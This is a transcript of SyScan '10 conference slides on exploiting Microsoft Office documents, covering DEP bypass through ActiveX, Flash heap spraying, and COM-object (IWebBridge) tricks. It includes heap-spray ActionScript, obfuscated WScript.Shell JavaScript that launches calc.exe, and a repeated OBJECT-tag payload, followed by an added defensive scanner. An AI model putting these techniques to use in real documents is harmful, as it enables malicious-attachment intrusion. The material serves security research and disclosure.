Syscan 10 - Office Is Still Yummy - Nanika TT (Publish)

Exploiting Office is not as easy as before, because a lot of Office vulnerabilities have already been disclosed. Against DEP and ASLR. Free exploit. Think differently! No more memory hard work. An effective trick to PWN.

SyScan ‘10

Office Is Still Yummy


How to Defeat Memory Protections in Office Document Exploitation

Nanika <[email protected]>
TT <[email protected]>
Who are we?

Security Researchers from Taiwan

Ming-chieh Pan (a.k.a. Nanika)
• Research on
  • Vulnerability research
  • Exploit techniques
  • Malware detection
  • Mobile security
  • Windows platform
  • Malicious document
• Disclosed
  • CVE-2006-3431 (Excel)
  • CVE-2006-5296 (PowerPoint)
  • …
• Member of the VRL of COSEINC (07~08)

Sung-ting Tsai (a.k.a. TT)
• Security researcher and software developer with Trend Micro.
• Innovation Lab in southern California, US.
• Research on
  • Malware detection
  • System vulnerability and protection
  • Web security
  • Cloud and virtualization security
Agenda
• Targeted attack and malicious documents.
• Against DEP and ASLR.
• Free Exploit.
• Think differently! No more memory hard work.
• An effective trick to PWN.

Targeted Attack
Targeted Attack
• It has become more and more popular.
• E-mail
  • Pretending to be someone you might trust.
  • Malicious links or attachments.
• Difficult to detect
  • Especially with a 0day exploit.
• Malicious Document
  • A very important role in targeted attacks.
Malicious Document
• Popular applications and document formats are all hackers' targets.
  • Microsoft Office documents
  • Portable Document Format (PDF)
  • Web pages
  • Flash
• Recently most researchers have been focusing on PDF and Flash vulnerabilities.
• Is Office becoming safer?
Office is still yummy
Truth
• Exploiting Office is not as easy as before.
• Because a lot of Office vulnerabilities have already been disclosed.
• Microsoft has been trying hard to deliver patches.
• Microsoft has implemented new technologies to protect its applications.
We are going to share some techniques that we can still use to exploit Office documents.
Against DEP
DEP is not enabled by default in Office XP, 2003, and 2007.
DEP
• You can turn it on.
Against DEP (popular ways)
• Popular tricks
  • Using SetProcessDEPPolicy() or NtSetInformationProcess() to disable DEP.
  • Return-oriented programming
• Limitations
  • 'ret2lib' or ROP are not easy to use when ASLR is enabled.
  • Shellcode should handle other problems.
Who can disable DEP most efficiently?
Office can disable DEP by itself.
Against DEP (our way)
Office will disable DEP automatically when it imports a proper ActiveX control.
Demo
Disable DEP by simply importing an ActiveX control.
This technique can be used in Office 2000 to 2007 and Windows XP to Windows 7.
DEP Note
Make it AlwaysOn.
But how?
Against ASLR
Against ASLR
• 'Heap spraying' is an exploit technique that we can use in an Office document attack to defeat ASLR.
• By importing a Flash object into an Excel document, we can write ActionScript code to spray the heap.
package demo_fla
{
    import flash.display.*;
    import flash.utils.*;

    dynamic public class MainTimeline extends MovieClip {
        public var byteArr:ByteArray;
        public var shellcode:ByteArray;
        public var demo:ByteArray;
        public var demo1:ByteArray;
        public var b:String;
        public var a:String;

        public function MainTimeline() {
            addFrameScript(0, frame1);
            return;
        }// end function

        function frame1() {
            // The slide demo uses a run of 0x90 (NOP) bytes as the payload.
            shellcode = new ByteArray();
            shellcode.writeByte(144); shellcode.writeByte(144);
            shellcode.writeByte(144); shellcode.writeByte(144);
            shellcode.writeByte(144); shellcode.writeByte(144);
            //...
            // It could be a lot.

            // Grow a ~1 MB filler string by appending 4 bytes per iteration.
            b = "\f\f\f\f";
            a = "\x14\x14\x14\x14";
            while (b.length < 1048576 - (shellcode.length + 64)) { //2097152)//1048576)
                b = b + a;
            }

            // Convert the filler string to raw bytes and assemble one block:
            // 4 marker bytes, the filler, then the payload.
            byteArr = new ByteArray();
            demo = new ByteArray();
            demo.writeMultiByte(b, "iso-8859-1");
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            byteArr.writeByte(64);
            byteArr.writeBytes(demo, 0, demo.length); // writeMultiByte() takes a String, so copy the bytes instead
            byteArr.writeBytes(shellcode, 0, shellcode.length);
            demo1 = new ByteArray();
            demo1.writeBytes(byteArr, 0, byteArr.length);
            //loop ...
            return;
        }// end function
    }
}
Demo
Spraying the heap
We need a vulnerability.
An interesting finding

8856F961-340A-11D0-A96B-00C04FD705A2
WebBrowser
Get a free exploit.
Get A Free Exploit
• Convert existing IE and Flash web vulnerabilities into Office vulnerabilities.
• It is easier for exploitation. You don't need to worry about DEP, because DEP is disabled automatically.
Risk
• Most users will not be aware of an IE or Flash vulnerability when they open an Office document.
• All existing browser protection mechanisms are hard-pressed to prevent this attack.
• AV vendors only check malicious web pages, IPS vendors only inspect web traffic, etc.
Demo 1
Effectiveness of DEP disabling
CVE-2010-0806 (IE vulnerability)
Demo 2
IE 0day = Office 0day
Microsoft Security Advisory (2219475): Vulnerability in Windows Help and Support Center
Demo 3
Flash 0day = Office 0day
CVE-2010-1297 (Flash 0day a few days ago)
Think Differently!
Maybe we don't need hard work in memory to defeat such protections.
Making a malicious Office document without smashing any memory/buffer contents.
(New trick to PWN)
Introduce another interesting COM object.
AE24FDAE-03C6-11D1-8B76-0080C744F389
IWebBridge
IWebBridge
• This COM object is for Office Word.
• It is similar to the object we mentioned above, WebBrowser.
• But this object can load local documents.
• Of course we can use the above techniques to exploit the document. However, we are going to demonstrate other, easier tricks.
Trick 1 – You have to click
demo.doc demo.js

IWebBridge

<!-- demo.js, first version: a single attempt to create the control -->
<html>
<script>
    var x = new ActiveXObject(
        'W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l'
    );
    x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');
</script>
</html>

<!-- demo.js, second version: reload the page until the control can be created -->
<html>
<script>
    var x = null;
    function AX() {
        try {
            return new ActiveXObject(
                'W'+'S'+'c'+'r'+'i'+'p'+'t'+'.'+'S'+'h'+'e'+'l'+'l'
            );
        } catch (e) { return null; }
    }
    function main() {
        x = AX();
        if (x == null) {
            window.location.reload();
        } else {
            x.Run('c'+'a'+'l'+'c'+'.'+'e'+'x'+'e');
        }
    }
</script>
<body onLoad="main()"></body>
</html>
After 5 times …
After 10 times …
Demo
Trick 1 – You have to click
This trick exploits human patience.
However, there are 2 files.
Trick 2 – Make it together
Interesting IE behavior
demo.js
IWebBridge demo.doc
Demo
Trick 2 – Make it together
This trick exploits interesting IE behavior.
However, on Windows 7, IE8 checks extensions.
So reload() doesn't work in some environments.
Trick 3 – Click to death
We don't use reload().
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=.\demo.doc></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=.\demo.doc></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>
<param name=url value=.\demo.doc></OBJECT>
...(1000 times)
Demo
This trick works in IE6 to IE8, Office 2000 to 2007, and Windows 2000 to Windows 7, including 64-bit environments.
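A defender's counterpart to Trick 3, added here as an example and not part of the original slides: a small Python scanner that flags OBJECT tags referencing the two CLSIDs the slides name (WebBrowser and IWebBridge), reports when one CLSID is embedded many times, and lists url parameters that point at local files. The sample documents, the repeat threshold, and the helper names (scan, WATCHED_CLSIDS) are constructed for this example.

```python
import re
from collections import Counter

# CLSIDs and names as given on the slides (WebBrowser and IWebBridge).
WATCHED_CLSIDS = {
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser",
    "AE24FDAE-03C6-11D1-8B76-0080C744F389": "IWebBridge",
}

_OBJECT_RE = re.compile(
    r"<object\b[^>]*?classid\s*=\s*[\"']?clsid:\{?([0-9a-f-]{36})", re.I)
_PARAM_URL_RE = re.compile(
    r"<param\b[^>]*?name\s*=\s*[\"']?url\b[^>]*?value\s*=\s*[\"']?([^\s\"'>]+)", re.I)
# A scheme needs 2+ characters before the colon, so a drive letter (C:\) is not a scheme.
_SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)


def scan(document, repeat_threshold=10):
    """Report OBJECT tags that load the watched COM classes.

    'repeated' marks the Trick 3 pattern (the same CLSID embedded many
    times); 'local_urls' lists url params without a scheme (local files)."""
    counts = Counter(m.group(1).upper() for m in _OBJECT_RE.finditer(document))
    findings = [
        {"clsid": c, "name": WATCHED_CLSIDS[c], "count": n,
         "repeated": n >= repeat_threshold}
        for c, n in counts.items() if c in WATCHED_CLSIDS
    ]
    local_urls = sorted({u for u in _PARAM_URL_RE.findall(document)
                         if not _SCHEME_RE.match(u)})
    return {"findings": findings, "local_urls": local_urls,
            "suspicious": bool(findings)}


# Constructed samples (placeholder CLSID in the clean document; not the slides' demo files).
CLEAN_DOC = ('<html><body><object classid="clsid:11111111-2222-3333-4444-555555555555">'
             '<param name="movie" value="http://example.invalid/a.swf"></object></body></html>')
TRICK3_DOC = "<html>\n" + (
    "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>"
    "<param name=url value=.\\demo.doc></OBJECT>\n") * 12 + "</html>"

if __name__ == "__main__":
    for label, doc in (("clean", CLEAN_DOC), ("trick3", TRICK3_DOC)):
        print(label, scan(doc))
```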
Conclusion
This is a quick guide for LAZY Office hackers.
Conclusion
• We provide some ways to see document security from other perspectives.
• We can still make some effective exploits without smashing any memory contents.
• A new platform for exploits?
  • Ex: exploiting a Flash vulnerability in Office is easier than in PDF.
Conclusion
• Actually Microsoft has done a lot of work to make Office safer.
  • We have been doing this research for years. Our main test versions are Office 2003 and 2007.
  • Recently we ran only rough tests; some tricks might not work anymore.
• Update (New!)
  • Microsoft has released a patch to address the problem in June's security update.
  • http://support.microsoft.com/kb/983632
  • Security Settings for ActiveX controls and OLE objects in Office 2003 and 2007
What is your office version?
Conclusion
• Our findings are still risks for a lot of Office users.
• We will continue our work on Office 2010.
Thanks

Nanika
<[email protected]>
TT
<[email protected]>